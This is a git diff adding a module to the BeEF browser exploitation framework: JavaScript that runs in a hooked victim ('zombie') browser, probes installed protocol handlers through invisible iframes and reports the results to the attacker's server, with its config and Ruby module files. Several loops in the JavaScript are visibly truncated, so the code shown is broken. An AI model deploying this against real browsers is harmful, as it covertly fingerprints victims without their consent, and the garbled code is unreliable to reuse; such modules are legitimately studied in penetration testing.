diff --git a/modules/host/detect_protocol_handlers/command.js b/modules/host/detect_protocol_handlers/command.js new file mode 100644 index 000000000..1c84d64b6 --- /dev/null +++ b/modules/host/detect_protocol_handlers/command.js @@ -0,0 +1,78 @@ +// +// Copyright 2011 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + // Initialize + var handler_results = new Array; + var handler_protocol = "<%= @handler_protocol %>".split(/\s*,\s*/); + var handler_addr = "<%= @handler_addr %>"; + var iframe = beef.dom.createInvisibleIframe(); + + // Internet Explorer + if (beef.browser.isIE()) { + + var protocol_link = document.createElement('a'); + protocol_link.setAttribute('id', "protocol_link"); + protocol_link.setAttribute('href', ""); + iframe.contentWindow.document.appendChild(protocol_link); + + for (var i=0; i"); + protocol_iframe.setAttribute('src', ""); + protocol_iframe.setAttribute('style', "display:none;height:1px;width:1px;border:none"); + document.body.appendChild(protocol_iframe); + + for (var i=0; i').contentWindow.location = protocol+"://"+handler_addr; + } catch(e) { + if (e.name == "NS_ERROR_UNKNOWN_PROTOCOL") + result = protocol + " does not exist"; + else result = protocol + " unknown"; + } + if (!result) result = protocol + " exists"; + handler_results.push(result); + } + setTimeout("document.body.removeChild(document.getElementById('protocol_iframe_<%= @command_id %>'));",3000); + } + + // Return results + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'handlers='+JSON.stringify(handler_results)); + +}); + diff --git a/modules/host/detect_protocol_handlers/config.yaml b/modules/host/detect_protocol_handlers/config.yaml new file mode 100644 index 000000000..ec7fcaf85 --- /dev/null +++ b/modules/host/detect_protocol_handlers/config.yaml @@ -0,0 +1,27 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + detect_protocol_handlers: + enable: true + category: "Host" + name: "Detect Protocol Handlers" + description: "This module attempts to identify protocol handlers present on the zombie host.

Only Internet Explorer and Firefox are supported.

Firefox users are prompted to launch the application for which the protocol handler is responsible.

Firefox users are warned when there is no application assigned to a protocol handler.

The possible return values are: unknown, exists, does not exist" + authors: ["bcoles"] + target: + working: ["IE"] + user_notify: ["FF"] + not_working: ["ALL"] diff --git a/modules/host/detect_protocol_handlers/module.rb b/modules/host/detect_protocol_handlers/module.rb new file mode 100644 index 000000000..2447e87e5 --- /dev/null +++ b/modules/host/detect_protocol_handlers/module.rb @@ -0,0 +1,32 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# Some additional protocol handlers # +# ChromeHTML, code, Explorer.AssocProtocol.search-ms, FirefoxURL, gopher, icy, ie.http, ie.https, ie.ftp, iehistory, ierss, irc, itms, magnet, mapi, mms, mmst, mmsu, msbd, msdigitallocker, nntp, opera.protocol, outlook, pcast, rlogin, sc, search, search-ms, shout, skype, snews, steam, stssync, teamspeak, tel, telnet, tn3270, ts3file, ts3server, unsv, uvox, ventrilo, winamp, WindowsCalendar.UrlWebcal.1, WindowsMail.Url.Mailto, WindowsMail.Url.news, WindowsMail.Url.nntp, WindowsMail.Url.snews, WMP11.AssocProtocol.MMS, wpc + +class Detect_protocol_handlers < BeEF::Core::Command + + def self.options + return [ + { 'ui_label'=>'Link Protocol(s)', 'name'=>'handler_protocol', 'description' => 'Comma separated list of protocol handlers', 'value'=>'http, https, ftp, file, mailto, news, feed, ldap', 'width'=>'200px' }, + { 'ui_label'=>'Link Address', 'name'=>'handler_addr', 'description' => 'Handler Address - usually an IP address or domain name. The user will see this.', 'value'=>'Hello-From-BeEF', 'width'=>'200px' }, + ] + end + + def post_execute + save({'handlers' => @datastore['handlers']}) + end + +end